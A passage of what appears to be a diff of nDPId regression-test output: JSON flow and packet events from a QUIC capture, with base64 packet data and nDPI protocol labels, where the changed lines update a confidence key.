e9qgbXIUuhMGDWNAnyQ+uYXiH2Jephgdag65enzMRnzpWg6tOxGmRHM\/sp7fpGYwk8PUnJ\/bg3wGtSnXhZccRwt0adDkhfdJ32tQWidjaGerN9H2lZ7O397QtbCs9\/8om91WjQ21YVaDo4Ipv8H0+f1V\/Cc42HBGsarDGnoyUmUg1jicgM5DPMJpvLG2UQQK5tiuC\/cbEV8WUL7QwOcxB3jbJTnxR1MHJT3pp81ODQhzEb3PhIJ\/5Cs0fOuGXlljtXRHGXKKK9NsXQ0izy4kIRIbdXUZKKUe4T4svk7KGeA3O23ttudesKDm99vJFGPLYZ34JAet2qmXSBcBuHQHN4aXeGdVG7MFzyQ92k+oQwlhlcIAhjHVS07UHZXN\/vQViV2LX6DSII6bHO8BhhtxKEj+5T+AEO+gFSPXVLnsAtt9jbTLOZtW1OuAXvN2H99cPQ6kiz\/OG9Z9DeWz\/n4jYXXfnHNa1A5r8RPBukPjk+DreRRGc9TBqR\/n8DDhNakfL0Fck3RKiTr8g2Av+YbMsrLWtvcnoT0rNWL7JWLcj4+4\/jtD3F4oDSeZdh9waOz7hGXnbyoVXNWXrcFpfx77eeqj51aL+3KRVwUbkgRwo5pHgL7hEnxN9VPb3Nbay587MleldGfNDOngB7dKByzM6zduwHhffnRWrDEBE3EQQI5wNwKLOIv9dQzppwC58eZxY0Cxh0nyCfck9L+upLS\/SSPRp0lZCWPVizK57z1DXIwneHbP\/8Hgysu7PPLkyCRSECVbbbitAvbtwLTHK33sAbO3oKAAAXnwbYjqk9lZmdLeO84o92phBblzzTWEVyzJf6XwtEie79iUzv0gOZKqtupDWJnjOgWOhhSra3KOxaFoHE05l7vFbVZMWFjqvSUOIj7aT8pRtZ3A8XiI4yAenMZbx8Noig2Tv\/4iZBtEhsXIEPJ\/GdI+cZsswHBmC4MoRRX8sfAcQcLKC0NsE8iTGSOI5BQZLzHhGSKkGn8XVlyAlmI52p44RHuokDQeePWi0IqXdipLo52vUi32A9W5ZySu8wjwH0+TmQOsjtyEt1WRsQ9wLF3apv\/TUW4+usvpV159wu9QNjO39MwP7rVLYpRTpK2fHgNOq47+RoVsFZDNOEQMG6JcZfYhdRpJCFZTxbCJLGBrNE8SO9hLhrTXR0B0IZGDIZ35DJlgU3Za+yK3uSCBc3IN0p97ksRGA5FKvCPtJcsM2\/csH6\/HU1qf1f0iRNI\/TtUb6I73fJb1bLdQeKNHntzmogBwn9oPuqo+gtLSwtXae5sl70N5g4LrZ8PFnTx2lQMUWHnNA7\/NfKlV24zKPWKBQFEp1Ll+GkIQ4+2VSqwKteIza9AEA0HQRFuVoFbCOySV1C2F5DI6b3bUAcZPOS4EK5sgcvgQXK\/kw5Lml\/5HXzi6wNd7ujorlYuy1rrbgADxiFT3G3+7eEQmrzleWwgR84fGJrsGXGWRRksb0D4sgTRBJoHHnzf+UHtoZlhKZ7MrrWCe+rgmAPKYrQl5HS2h0M4Sd0TsvG35w8Nfd7uE0Cm1gQkCkKH2QZcTaB17nO+93nufc4orBsf0H"} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_packet_id":3,"flow_last_seen":1621500711118,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500711118,"pkt":"AAAAAAAAAAQAXWCjCABFAAVidIFAAH4RAyo0uxSvZsLPs9AMAbsFTmIiwf8AAB0ItCn86+Se4YgAAEU0FvsScjgiXb43Z5OHmvEYwaOoC42xDpqJfRfqlKRpZwF5AnAxrqFV79ZpFnEvEhLmveXc5xDzsSroW6m86jG45I0fFyX3DYlFTlRWn6Sytea5JPO12EfJbfqSFvNzEqmQ4gFas2HXJ2FX2ZoFtOrT1Qp43etaUsidgduMrH94THaDB9pQcwHKupL0h5YJ21d4uDpduyjYmRI\/jSmxZ2o5487BjNxGIiLtUrbwVkNIPSfjyMP5aDNyEKH0uc0UKMUvLMNr7XpQ1A1u47hFs287N4mHIG56vvgNzeLUDt0k1MPT\/kGpWCx8pGpFNrvk1nrkx7VkZAvjp\/9BdDBzSjx\/eUYtrNhzQ0IQe0hI2dyVNc8oZJZ9LtwNkx13TL3XaejmmuaYZ5B1EgN210MMBgN2q4MKppTuAvCQdN0rYg1Eetfey1Czpq8DvYrtRob0CYoPxRNQb4hQY+mAtVm5In1K8uiwgIb9fwBZ4878UCDelVNFoIUw+l3DO2r3eQiyJ1qJ2FQD5njNdWfokooKrW7pkJaWp1Su7UEKIwCrHqPQdqZjdBG1V1fXoUW3f50uoUtNBqxzmzG\/nc6r9vmn7Hupo64j5xAOGxtoJ7+CXMmYHHWY26B1SVO8GEqfiJKdUBeSOJP+\/MJ8MxDfNBGk\/ZN++nWubo5tvAD59mguiYbs2TJn97d75ZXwCSvntISAbbWVTp8AcyBv7hFM4CenTfEcDoR0h+9UMmt410Igj8DfCq0uBJ9bfdd9vaavpedqeSBrcaCWj6Vm8lPgRR9m+idu+v42W\/Y7dhhPvUrZYy43dKrTyr1UA6FrlC0+cMVKwBuas+sYqkr29klDCbiXmBJwbwFjeK4tVoMcVU5tgERpJO29uTaQwM9TtLKYYpaiU3bEFvVtP\/Qtn3qhFg87\/I\/RWjoT+rBbR4QDQUW9VPOaC\/zE01OtUPc5D50Oe30bx8WsZ3NjQ\/Rz1culaGAqFUjPGD3UTvfe+YzvsST9oPhqowv7hv2g7D78AygZJDWj3Xy+kWEnj\/pB3Jx0\/OvXiqzf2tizghsbgz\/7TQfvenyU\/YjzQzisVkudIMBHZfHpFf1xszofNNVEViopslpwwFJvvLgUhw0aVf5anl4AFVfHf7Fbiq+ByHxdPrQzfWnqt4ebVjeIYwLQRD+Sc5q5KKw9n351IQvh3iLjQfOMlC29Lv8K\/f64xF454eAM+T3ej9aTbN2lpyk4d44ROP1Oa47QDp0riFycvY47pAgeZtogdK11E5+iMGpqTnOxn9+LXFyNRlhHrvu67ztK3yT1Q38o1K6t76Qdc2LLNxNb42ZTHdtkEvDq4+GjOdvvGXlynEQvbTtvdG6fACdyaH0xeuILHqQCt+BvoL\/9SLWq+5Q6qid0Ax80+f42fP1VeV80Df+srNlHtlx1gxx0eFSN\/ZxupB3yFoybkQHafOdB3DjIHqI2gODRQBgLO27D\/lTmmK6tKkQ951QvnyKrHxord7vZSW3Oq7RRLWR+SVjkGHmv3l\/Ze5hnE5cZJuxcuPAk2mAKwF+6k5B3F+cbJWDnxNeoh4C1jTw62drlxgT1oJkzh1x0IBq5I1mmRgifHxa24oQE8RAkrXlt\/l6PygI3tBmwEN7W9ztIBr0mGHgoMXHSI2+\/eoOzMY2+qscRsVIWNEx6WLxrztwLs9nHe+LJi\/8hqm0+hjADeZHms9rDOsWgE7WwhNZcW0TgSYYOby+hR7hjZUUjIMuY3PvHUBu9nOxFOj6gdeVPSzcIl5MJbJVDUDw2yOc8"} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621499130835,"flow_last_seen":1621499132950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":97,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621499083794,"flow_last_seen":1621499083794,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"185.186.183.185","src_port":49217,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621499130835,"flow_last_seen":1621499132950,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500712321,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"198.74.29.79","src_port":61286,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1621500832402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621500832402,"pkt":"AAAAAAAAAAEAS1QMCABFAAVihQ5AAH4R1KOokEAFTOdoXMNnAbsFTmnVw\/8AAB0I\/OwNUvQ+5iAANwD\/vPgHoWBY9NVx91aESVG1GnIYeTvUSJob\/THkhDsxHgK0tQMlP\/y+OlG6T8LyKR+iBLXMyoZE\/aVKFhxdLISFi4uHtAlWOTu3Tp\/rNeF0Ycpw9lNtrGZKHgK52aGmw1F+Vm7gts63ZzZWpjO2b2dfnUcihRfdcWSl8WQQqp9Bex37Efxn8GSZ9yV9+YweKHZuoktgPz6lo1Hx0py7NH2sEOpCsHuOmQV3pkdWkgyH5Yy8e+mDo3M8Lf4uvHc+eXJBa3EaCkPMxen5GcdhzCr3mrXeME5XHL2nTes6kErkbatKTZJBia8PejzLFSjdIh878tNRvmWaKnFQUTDgcDftx6OhWfT9aTAtihrhh80i+NJdXObI+LP5jfp6VUNFk\/iSFBb\/TLXGEWIDnGVL6jXCYr\/jF550paaG2\/05LqVb0lAO2DQezwhWmWBhSJGamJQyHgYTP2G2z579ukMU+m1MIBlp6G0fCF77SkWYSpcZa37JwyO+oGTmTTrQw4DDsfnNJ6qtURb6c1EZgljs+2MQvOyBlUgLiqJfL9Sy7+bVNh6BSZmu2SnB0XsrJz8ExvgL2JeLgA1jPTRz3PGX2IfOOJmvZ\/Iw5bWBcHVXAq+IcoiBl9hHt2AkJHGz\/byaPbJJ66HJfgB14EIB\/lUwQo1A1SSUXMKv\/TK9koxXTwle8Lkn54qEQdqJWRvVbwg0JseXWs8OMsGkFLele\/q07epiVACDd\/g1Jm+ZePpL983W2YeTK+eU7VLHC3JA09oJxkbg1B+bTVBsiq0+mlaeyZ4QsRiZnP+9H4807KaDybRKTE8tQUtEr37hHuYCyw5PxJ8FFjKWt2QiUzVAiu0MjkYwdO09pwoMaH1i59EPGPGNhR57sTKB2wVEV6JE6NQ8yLMvSBUd9dyDB21nWx2ARNrcsc1WlrbGEhGKx8y96up+FRZHCjeNJbO6GPNGdyZS+RcIKDc\/sxkx7RupbqAi+d8Bt+oXDSg0tZAmjCf8VvVg\/k80bbgPZjm5To457D0tTkTf8V6Zx8om4HCzWH0sHPFBmf27ADSR6DlozQlivcbzfZaKUML+CfQN\/AOYuLtlr\/H4lqxR8dtAwKahvwW7\/NRmgYEFXDJN3bJS9GjmGOOgKZxwI0uH7FodIm88enl9xRV0Jvgh8Kgk1aL11oukFFBgq9kowqa4t5sHXxG027eiPUY3I+LvD3YOs01STBZNgyX4zoY1udrG790mdQfHt0JsUey8gKDDV6Mrii7E31WSascM\/TXrq7IBo+QDu6smYU6IFRAByq+cHfvGh9cGLPvAzc\/PaSrCQ8lQZlhadWowHm9HfqjTWwtDDxzY1ZzEFn\/ykUcQ5T517Ga\/PzlrVjwpdzkZabhpXnKYalHNVtkvXskX+fuRlw1O9pywR139ESVKUEegskOPrIBR11Ur8xk0\/nC3Mw1zJ98R1AFW1bQwe+QwJvSpwFpYhm\/2wNkJHrE5fUKBl09Wmtfin\/0fDKjZAnq1XzsVpqje2zDaCTh7VEpkWk5S3q86sRcojMPfzDFUdFBNEIT3dLWmuLxfFG2Ho6lWkZAgHIKSSvHA84mOYVnYLexouIlL+EhwoOmEipiiUiVJXGZkSCwjtyupj0BjO2QULdNBtK\/XGoJduknKIbcYWebyEnEpxO1Cicl7fEXS9+YbM\/rMPWEr+mcAUdeFx32z2bF0zY4DxjEv26u3i5TRnvLzaQCmin\/duWBzxsVC3pO\/wjp9iIlGSS+Qcatkp0jS9\/HNB9\/ya8my0blefl49VH7\/"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621500832402,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1621501125036,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501125036,"pkt":"AAAAAAAAAAEAS1QMCABFAAViGchAAH4RgMKokEAFQSEzSv9QAbsFTrOQxv8AAB0IBDctHg05eGMANwA63caAA9thM8CnmtvPCsUhrbHTSUm+PmUcMNSKbWxGe5n0KlMPA\/Ab1TeVXrcKT\/s6bNMGiVVE\/Y\/69wmX+dmpzOGyJXfQtZPXNvgdAety5H0aaOEE7kffH7GYopi+TnU7X81j2zr5T1AcyXW4xwfPQqNjCkl7q4Y3aeDwCNcBIXJjS0cRABpWd4CFVxJeR67TsCsSv5FbpkqXMrDYhjzjrve\/sy87Yz7Z9ci1SSWv37yRACmKZulUZgb2lUkKSfenjONGW3S2wzKcrlj+TJQRg8\/bM9SNvt\/mCcgtVbTKLWbc+6PK5acKkQo3AdoGk5LEPb3l\/lQbLDG7JPRHJbZN8WUgPhRMqvGmH9CVBsbUQhTCVDm79glJnIm864PHxQ+t0sJHyebmg6XpGa2XYkUH2udqnf5+TTklcbBY\/R+qQP9YENJHrWSqS3ukUykQ0LjwlbuFhVHFAQ\/dxjDnWRSWKbRXG1NBvSlBffj33m41y\/BGqblG4oqUMrPzg1AdNzGWkFx3dfG4qE6jX4vypIKbmC7ww11\/bnqazyGvXVb\/qGv65\/bNEhR2F5JiCl4VlKXNgd2pkEqH425n6llnIOarnIlAFSHuFowuohSpsD5QcFX5UcWdhvyCoeuvwf5QxCPPKwuVKkeBE9JZdqIAdgwk6k2JahHoe9xE0fV1WdUs9GEH0pmQ8XxwJfQNNe9pfm7SAvyvW6AGvman3pEUJ3JJN3sVwyOiSI46dmLN\/gLYOaXzUMscfs3uNK42vabWH2f0fHSfBVduUsdDgwj2A9X9vZeZHeEU0AOwu1JroY\/X9M5vYPFxgUn4ui0etmumSVF1NfkFMIHTL2APYRacjCGMcVMTtDDglynqnLKHYUUQtNWqewrNtG9PHzcXuPhHzdOY0tg9FgaoraKpz6q5UqcKBzr2JjkXTep9JNqk5XEbwydGTgI5uoUzDCEAd9SVY58G6YNgOXJM72nV8QMCKvZ3XaSIH5w8qvkn4y+DE1msPs+0jjDIyDXNocrSDJ1AHCTzzWkP+w6H60iAOu9cn+Mnv8SiYPPciI\/PJWXhwM3wLkeNtUoiSczzgq7\/Z0NlAzOcUuSPUr404jqpSbsJLrUCNh2Hh0dkAD64yuGEGkYaLp8R5cHVIH1ItyvLeUglmfKQ9Uy1in+NSc9s9rgslR0ZYvwGV43IdrN1a8sbpRZRn\/6y6xJSP6VRA3qbgEM1014Xzxzg1C1k2pXKaZ3dRIS7DAmfP9AU\/jP7\/XH1KfbRfliwERe1f0hLOCnRYQayZGEdVA7U4EwP4GWIPM1mQJfc4x1wWHWPhcFpf7\/3kzOtmlx8FRonLLppe8qkuqfrTbLOUjx4ZI4BETBbxLbvlIKHEhoiCBd+yDUZCFKScdNpwrxVWVSz0cwfPkFvXivV0Btog7bQP8r0ps03inXLu3iY42JhuwOQtgnq9gOUYo5mWHDsf\/dFNji6zcIuareN16h5QMAId9cs9d8XeEtgmsP3EkHv62qC0lObg7DYq50UhiG+dr7cGC8xrqlQYyQ2eUFldqUAvW5Yq3oPDufxJfRMe4FoawMPGgol1Fx4lcF3O9ljlCrqKWUD5XziIcnMUjDT5ommu1A4ChUADEhFdaXkO3z0ajdsvt+2FU+8jk8sCeHs0aoS8LD9tqGOK\/tBhpgsLDtXqVg4vWFfDpOmZ6anyereIg5y9YTigYUAnRYoUArd1znOjveswaiQB3BfOR1AQE\/Wu+8zomZDAHW7r3Or47VOVnEd3KueolaHuDAxCBxZQsZy"} -00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621500710201,"flow_last_seen":1621500712321,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501125036,"flow_last_seen":1621501125036,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"65.33.51.74","src_port":65360,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621500832402,"flow_last_seen":1621500832402,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"76.231.104.92","src_port":50023,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} +00744{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1621500710201,"flow_last_seen":1621500712321,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":5400,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501125036,"l3_proto":"ip4","src_ip":"52.187.20.175","dst_ip":"102.194.207.179","src_port":53260,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00636{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621501260783,"flow_last_seen":1621501260783,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621501260783,"l3_proto":"ip4","src_ip":"159.117.176.124","dst_ip":"207.121.63.92","src_port":64134,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02306{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1621501260783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621501260783,"pkt":"AAAAAAAAAAQAcbmbCABFAAViVLhAAH4RRAufdbB8z3k\/XPqGAbsFTtJqyv8AAB0IqwzBH+7SJ6oAAEU0OmGuRD6o6zt6nf9tmhZ4egDU3ziCGGMLigzQd\/qcgJuXuFXJaHBdLU0MBpsdPKMeIvS9Od3J6aS7A4aqWHEzIUcAYpLZNGiwuH3wRo\/ZCRSY8hB6LE3YzLe42CdSzc5lCzItOsVUkYEC0ElANHXZEVA1CYAydF9uHTTyCq2uXRt3pMNkc6SD2TRzdAjxNMy4aC+pKc8u60PxO0LJCtV5c4GHi\/apOFYyznJrd5zwDibl6ADYf0eOlYG7Dmb+62KXGzs+UZINoqFEItj8sokCUApXkVgH3JMM1tQ7\/i+CPMar5u5VhzM0xoMe4DQC0z+Yuf3p0TEn1Yqj0xXSzHscv\/FAGmONfCIQGf4DqCpAxJhcdINRN9hpMwFEfhYgZXMbdUkpqQbEUlH6Jh8L0xXSG8BNDbJ+HqsCUU8yfHEs9031W1jXujoXsokpBHj6NRhfYT40cfJ0owXrRfPAsakJrEfIbY678aDECo1jdyeAUnmWY+XbG8o1nY\/4ODgRYgmuoc3IOboNUvx8dTlRVrTI1abSpt63k1mZBwz2PcIo80+jYFQUD8COKs9GGRBzV5HYfMiKnpB8E0fvddrtWuczrHTEHaj+A8EU23AUAoyRQeuZRJ2ND3muZ5PofS2Dkb\/RLqYEnLx53b3gsbjBEhQD9jTXMS\/CkNOxA2dXLmL1VCbZDM001ClSjf0VqrWyNkHZ020vH5Z87sRnfqRjhEFyC6btyFOJe50iTVCZPNiJgpQQjGKjO4rNKkdOhqVKJYV3tZ30pOlvkz82jkWMMrXlfnLtb9s5pzTLv9t0tUOoQ4QgbRKhgDzve\/xApJG8bUCntJD7lpCAx9F9HoZMq40CxcFnF2sEh63lTmmld2YtjKFNOpA3UantQuZCNL\/CmftmHYYLrD7QkKm4TvXgbIR8RxVZ+EtiDOPLtHOx6d9B7dMcTY3Mfmi0JILNHIfrPCWog+RxVMh6d8lhNxI62zp